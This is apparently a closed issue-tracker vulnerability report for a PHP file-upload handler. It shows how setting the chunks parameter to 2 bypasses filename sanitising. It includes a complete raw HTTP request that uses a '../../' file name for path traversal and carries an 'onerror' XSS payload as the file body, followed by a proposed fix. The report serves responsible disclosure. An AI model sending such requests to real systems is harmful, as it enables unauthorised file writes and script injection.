Closed
Description
Dear @ignacionelson,
I found a Path traversal vulnerability on your application!
Description
Because of not checking if clause for chunks parameter when chunks >= 2, the user with Uploader role can add value 2 for chunks param to bypass fileName sanitizer
-
In Step 1: 3 parameter that I can control when using upload function
chunk,chunks,fileName -
In Step 2: The if clause check if
chunksparameter <2, thefileNameparameter will be handled. So i add value2forchunksparam then it will pass Step 2 and go to Step 3

if i don't add value for chunk then the chunk parameter goes to 0 and add value 2 for chunks parameter, i can pass this if
Step To Reproduce
- Use burpsuite to capture upload request
- Change valuable of
chunksparameter to2and add dot dot fornameparameter to escape root directory - The file was uploaded in webroot directory with
index.html.partname
Request:
POST /includes/upload.process.php HTTP/1.1
Host: 172.16.0.12:4444
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4677942761162401681381669887
Content-Length: 2817
Origin: http://172.16.0.12:4444
Connection: close
Referer: http://172.16.0.12:4444/upload.php
Cookie: PHPSESSID=7simdbjnrvdjpeq6bkvfukrdvt;
-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="name"
../../csrf.html
-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="chunks"
2
-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream
<img src=x onerror=alert(1);>
-----------------------------4677942761162401681381669887--
Solutions:
Add if clause to check when chunks parameter >= 2
Metadata
Metadata
Assignees
Labels
No labels

